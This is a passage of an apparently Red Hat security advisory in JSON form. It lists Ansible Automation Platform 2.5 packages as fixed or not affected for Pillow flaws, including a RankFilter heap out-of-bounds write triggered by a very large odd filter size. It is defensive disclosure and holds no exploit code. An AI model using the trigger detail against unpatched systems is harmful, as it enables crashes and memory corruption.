"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pillow: Pillow: Denial of Service via crafted GD 2.x image file"
},
{
"cve": "CVE-2026-59197",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2026-07-14T17:01:29.487456+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2500043"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow prior to 12.3.0. The public RankFilter API can trigger a native heap out-of-bounds write when given a very large odd filter size. ImageFilter.RankFilter.filter() calls image.expand(size // 2, size // 2) before rank-filter size validation, and ImagingExpand() computes output dimensions with unchecked signed integer arithmetic. This can lead to denial of service and limited integrity impact via heap corruption.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Native heap out-of-bounds write",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Pillow\u0027s RankFilter API is vulnerable to a native heap out-of-bounds write when a caller supplies a very large odd filter size. Expansion runs before size validation and ImagingExpand uses unchecked signed integer arithmetic for output dimensions. A remote attacker who can drive RankFilter with attacker-controlled sizes may crash the process or corrupt heap memory. Fixed in Pillow 12.3.0.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
